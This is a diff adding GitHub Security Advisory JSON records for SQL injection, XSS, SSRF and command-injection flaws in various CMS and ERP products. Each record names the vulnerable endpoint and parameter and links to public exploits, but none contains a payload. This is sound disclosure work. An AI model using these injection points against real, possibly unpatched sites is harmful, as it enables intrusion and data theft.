b/advisories/unreviewed/2026/02/GHSA-5v2q-744p-wj8v/GHSA-5v2q-744p-wj8v.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5v2q-744p-wj8v", + "modified": "2026-02-22T15:30:13Z", + "published": "2026-02-22T15:30:13Z", + "aliases": [ + "CVE-2026-2946" + ], + "details": "A security vulnerability has been detected in rymcu forest up to 0.0.5. Affected by this issue is the function XssUtils.replaceHtmlCode of the file src/main/java/com/rymcu/forest/util/XssUtils.java of the component Article Content/Comments/Portfolio. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2946" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/CvYzdxDNDoXWdKxvaehcvb1rnQK?from=from_copylink" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347316" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347316" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755037" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-85vj-mhr5-mmvc/GHSA-85vj-mhr5-mmvc.json b/advisories/unreviewed/2026/02/GHSA-85vj-mhr5-mmvc/GHSA-85vj-mhr5-mmvc.json new file mode 100644 index 0000000000000..81ee6d397a2e4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-85vj-mhr5-mmvc/GHSA-85vj-mhr5-mmvc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85vj-mhr5-mmvc", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2026-2947" + ], + "details": "A vulnerability was detected in rymcu forest up to 0.0.5. This affects the function updateUserInfo of the file - src/main/java/com/rymcu/forest/web/api/user/UserInfoController.java of the component User Profile Handler. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2947" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/MBymdGpuFoGQYuxEiH2cdC5BnSe?from=from_copylink" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347317" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347317" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755039" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87vp-v5jj-xmcq/GHSA-87vp-v5jj-xmcq.json b/advisories/unreviewed/2026/02/GHSA-87vp-v5jj-xmcq/GHSA-87vp-v5jj-xmcq.json new file mode 100644 index 0000000000000..a18a6537c1de9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-87vp-v5jj-xmcq/GHSA-87vp-v5jj-xmcq.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87vp-v5jj-xmcq", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25433" + ], + "details": "XOOPS CMS 2.5.9 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cid parameter. Attackers can send GET requests to the gerar_pdf.php endpoint with malicious cid values to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25433" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46835" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/xoops-cms-sql-injection-via-gerarpdfphp" + }, + { + "type": "WEB", + "url": "https://xoops.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8v8j-49p6-4ccp/GHSA-8v8j-49p6-4ccp.json b/advisories/unreviewed/2026/02/GHSA-8v8j-49p6-4ccp/GHSA-8v8j-49p6-4ccp.json new file mode 100644 index 0000000000000..0cb9daa02282b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8v8j-49p6-4ccp/GHSA-8v8j-49p6-4ccp.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8v8j-49p6-4ccp", + "modified": "2026-02-22T15:30:13Z", + "published": "2026-02-22T15:30:13Z", + "aliases": [ + "CVE-2019-25366" + ], + "details": "microASP Portal+ CMS contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code into the explode_tree parameter. Attackers can send crafted requests to pagina.phtml with SQL injection payloads using extractvalue and concat functions to extract sensitive database information like the current database name.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25366" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46799" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/microasp-portal-cms-sql-injection-via-paginaphtml" + }, + { + "type": "WEB", + "url": "http://www.microasp.it" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-96mq-76jj-h8p9/GHSA-96mq-76jj-h8p9.json b/advisories/unreviewed/2026/02/GHSA-96mq-76jj-h8p9/GHSA-96mq-76jj-h8p9.json new file mode 100644 index 0000000000000..caba98dd40802 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-96mq-76jj-h8p9/GHSA-96mq-76jj-h8p9.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-96mq-76jj-h8p9", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2026-2954" + ], + "details": "A vulnerability was found in Dromara UJCMS 10.0.2. Impacted is the function importChanel of the file /api/backend/ext/import-data/import-channel of the component ImportDataController. Performing a manipulation of the argument driverClassName/url results in injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2954" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347320" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347320" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755222" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/la12138/pa2fpb/gsz2l14wlz8c4nsn?singleDoc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-982r-pxpw-xv2x/GHSA-982r-pxpw-xv2x.json b/advisories/unreviewed/2026/02/GHSA-982r-pxpw-xv2x/GHSA-982r-pxpw-xv2x.json new file mode 100644 index 0000000000000..523c8aa72a63d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-982r-pxpw-xv2x/GHSA-982r-pxpw-xv2x.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-982r-pxpw-xv2x", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25461" + ], + "details": "Web Ofisi Platinum E-Ticaret v5 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'q' parameter. Attackers can send POST requests to the ajax/productsFilterSearch endpoint with malicious 'q' values using time-based blind SQL injection techniques to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25461" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47140" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-platinum-e-ticaret-sql-injection-via-ajaxproductsfiltersearch" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9fcj-8w2v-j38f/GHSA-9fcj-8w2v-j38f.json b/advisories/unreviewed/2026/02/GHSA-9fcj-8w2v-j38f/GHSA-9fcj-8w2v-j38f.json new file mode 100644 index 0000000000000..ceb95a71065f0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9fcj-8w2v-j38f/GHSA-9fcj-8w2v-j38f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9fcj-8w2v-j38f", + "modified": "2026-02-22T15:30:13Z", + "published": "2026-02-22T15:30:13Z", + "aliases": [ + "CVE-2026-2945" + ], + "details": "A weakness has been identified in JeecgBoot 3.9.0. Affected by this vulnerability is an unknown functionality of the file /sys/common/uploadImgByHttp. Executing a manipulation of the argument fileUrl can lead to server-side request forgery. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2945" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347315" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347315" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754590" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/la12138/vxbwk9/glws4ppukxqtpfhl?singleDoc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T13:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pg8-c68j-285r/GHSA-9pg8-c68j-285r.json b/advisories/unreviewed/2026/02/GHSA-9pg8-c68j-285r/GHSA-9pg8-c68j-285r.json new file mode 100644 index 0000000000000..a3aa80bd40ec5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9pg8-c68j-285r/GHSA-9pg8-c68j-285r.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pg8-c68j-285r", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25442" + ], + "details": "Web Wiz Forums 12.01 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the PF parameter. Attackers can send GET requests to member_profile.asp with malicious PF values to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25442" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47284" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-wiz-forums-sql-injection-via-pf-parameter" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ff6v-wx52-q8j8/GHSA-ff6v-wx52-q8j8.json b/advisories/unreviewed/2026/02/GHSA-ff6v-wx52-q8j8/GHSA-ff6v-wx52-q8j8.json new file mode 100644 index 0000000000000..075416ae90a88 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ff6v-wx52-q8j8/GHSA-ff6v-wx52-q8j8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ff6v-wx52-q8j8", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25452" + ], + "details": "Dolibarr ERP/CRM 10.0.1 contains an SQL injection vulnerability in the elemid POST parameter of the viewcat.php endpoint that allows unauthenticated attackers to execute arbitrary SQL queries. Attackers can submit crafted POST requests with malicious SQL payloads in the elemid parameter to extract sensitive database information using error-based or time-based blind SQL injection techniques.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25452" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47362" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/dolibarr-erpcrm-sql-injection-via-elemid" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fw7r-mghm-mcfw/GHSA-fw7r-mghm-mcfw.json b/advisories/unreviewed/2026/02/GHSA-fw7r-mghm-mcfw/GHSA-fw7r-mghm-mcfw.json new file mode 100644 index 0000000000000..0a9c52d2e067a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fw7r-mghm-mcfw/GHSA-fw7r-mghm-mcfw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fw7r-mghm-mcfw", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25440" + ], + "details": "WebIncorp ERP contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the prod_id parameter. Attackers can send GET requests to product_detail.php with malicious prod_id values to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25440" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47199" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/webincorp-erp-every-version-sql-injection-via-productdetailphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fwf8-cx3q-ch9g/GHSA-fwf8-cx3q-ch9g.json b/advisories/unreviewed/2026/02/GHSA-fwf8-cx3q-ch9g/GHSA-fwf8-cx3q-ch9g.json new file mode 100644 index 0000000000000..c157d4c71d6c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fwf8-cx3q-ch9g/GHSA-fwf8-cx3q-ch9g.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwf8-cx3q-ch9g", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2026-2952" + ], + "details": "A flaw has been found in Vaelsys 4.1.0. This vulnerability affects unknown code of the file /tree/tree_server.php of the component HTTP POST Request Handler. This manipulation of the argument xajaxargs causes os command injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2952" + }, + { + "type": "WEB", + "url": "https://github.com/CVE-Hunter-Leo/CVE/issues/10" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347318" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347318" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755166" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jcj5-xf7h-rwx7/GHSA-jcj5-xf7h-rwx7.json b/advisories/unreviewed/2026/02/GHSA-jcj5-xf7h-rwx7/GHSA-jcj5-xf7h-rwx7.json new file mode 100644 index 0000000000000..1ff85b882f570 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jcj5-xf7h-rwx7/GHSA-jcj5-xf7h-rwx7.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcj5-xf7h-rwx7", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25443" + ], + "details": "Inventory Webapp contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through GET parameters. Attackers can supply malicious SQL payloads in the name, description, quantity, or cat_id parameters to add-item.php to execute arbitrary database commands.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25443" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47356" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/inventory-webapp-sql-injection-via-add-itemphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jfw2-q9rx-mg64/GHSA-jfw2-q9rx-mg64.json b/advisories/unreviewed/2026/02/GHSA-jfw2-q9rx-mg64/GHSA-jfw2-q9rx-mg64.json new file mode 100644 index 0000000000000..48de793b1c44b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jfw2-q9rx-mg64/GHSA-jfw2-q9rx-mg64.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfw2-q9rx-mg64", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25460" + ], + "details": "Web Ofisi Platinum E-Ticaret v5 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'q' GET parameter. Attackers can send requests to the arama endpoint with malicious 'q' values using time-based SQL injection techniques to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25460" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47140" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-platinum-e-ticaret-sql-injection-via-q-parameter" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json b/advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json new file mode 100644 index 0000000000000..b9887ba3cc03e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2p9-fpj7-9fjp", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25458" + ], + "details": "Web Ofisi Firma Rehberi v1 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through GET parameters. Attackers can send requests to with malicious payloads in the 'il', 'kat', or 'kelime' parameters to extract sensitive database information or perform time-based blind SQL injection attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25458" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47143" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-firma-rehberi-sql-injection-via-firmalarhtml" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json b/advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json new file mode 100644 index 0000000000000..a609137b0d4cf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx92-pw43-vf25", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25457" + ], + "details": "Web Ofisi Firma v13 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'oz' array parameter. Attackers can send GET requests to category pages with malicious 'oz[]' values using time-based blind SQL injection payloads to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": 